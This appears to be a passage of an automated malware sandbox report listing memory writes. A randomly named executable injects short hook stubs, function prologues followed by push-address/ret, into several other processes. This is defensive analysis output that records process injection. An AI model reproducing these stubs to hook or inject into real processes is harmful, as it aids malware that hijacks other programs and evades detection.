                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2DF0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2E00000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 1720 base: 2E00011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A0003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A0006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A0007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A0008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A000A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A000B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A000C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A000D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A000DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A000EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A000FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A0010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A0015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A0016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A00187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A10000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2008 base: 2A10011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 136003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 136006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 136007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 136008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 13600A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 13600B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 13600C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 13600D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 13600DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 13600EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 13600FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 136010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 136015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 136016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 1360187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 30A0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 2496 base: 30A0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 28F0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 2900000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 4456 base: 2900011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 228003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 228006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 228007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 228008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 22800A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 22800B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 22800C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 22800D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 22800DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 22800EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 22800FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 228010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeMemory written: PID: 5608 base: 2280151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
